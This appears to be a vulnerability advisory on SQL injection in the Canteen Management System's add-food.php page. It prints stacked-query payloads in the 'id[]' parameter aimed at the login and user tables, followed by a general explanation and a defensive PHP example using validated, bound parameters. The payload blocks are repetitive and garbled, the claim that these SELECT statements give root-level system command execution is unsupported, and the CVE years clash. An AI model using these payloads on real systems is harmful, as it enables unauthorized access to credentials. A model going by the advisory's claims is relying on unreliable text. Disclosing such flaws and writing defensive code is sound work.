CVE-2022-43049 The Canteen Management System Project v1.0 had a SQL injection vulnerability.

This issue allows attackers to execute SQL commands with root privileges. In the example below, a SQL injection vulnerability is detected in the /youthappam/add-food.php page when it accepts the input 'id[]' with a value of ';select * from `login` where `id[]`=1'. This input could be exploited to execute system commands with root privileges:

    1. -------------------------- Add Food --------------------------
    > Select * from `login` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food
    > id[]=;select * from `login` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food
    > id[]=1;select * from `login` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food

CVE-2023-43050

This issue allows attackers to execute SQL commands with root privileges. In the example below, a SQL injection vulnerability is detected in the /youthappam/add-food.php page when it accepts the input 'id[]' with a value of ';select * from `user` where `id[]`=1'. This input could be exploited to execute system commands with root privileges:

    1. -------------------------- Add Food --------------------------
    > Select * from `user` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food
    > id[]=;select * from `user` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food
    > id[]=1;select * from `user` where `id[]`=1;
    -- SQL INjection Exploit --
    -- Description: Type: Add Food

SQL Injection

SQL injection is a type of injection attack in which an attacker inserts malicious SQL commands into the queries a website sends to its database. The most common route is user input that is sent to the database as part of a query. This allows attackers to access sensitive information stored in the database, such as usernames and passwords.
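
A defensive counterpart to the input handling described above, as an added example that is not code from the Canteen Management System or from this page: each 'id[]' value is validated as an integer and bound as a parameter instead of being placed in the query text. The `food` table, its columns, the helper names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Constructed stand-in database (in-memory SQLite); the `food` table is an assumption.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE food (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO food (id, name) VALUES (1, 'idli'), (2, 'dosa'), (3, 'appam')");

// Hypothetical helper: accept only a non-empty array of positive integers.
function parse_ids($raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('id[] must be a non-empty array');
    }
    $ids = [];
    foreach ($raw as $value) {
        $id = is_string($value) ? filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) : false;
        if ($id === false) {
            throw new InvalidArgumentException('id[] contains a non-integer value');
        }
        $ids[] = $id;
    }
    return $ids;
}

// Hypothetical helper: the SQL text is fixed; ids travel separately as bound integers.
function fetch_food(PDO $pdo, array $ids): array
{
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("SELECT id, name FROM food WHERE id IN ($placeholders) ORDER BY id");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed requests: one well-formed, one carrying the value quoted in the advisory.
$requests = [
    ['id' => ['1', '3']],
    ['id' => [';select * from `login` where `id[]`=1']],
];
foreach ($requests as $request) {
    try {
        echo 'ok: ', json_encode(fetch_food($pdo, parse_ids($request['id'] ?? null))), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```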
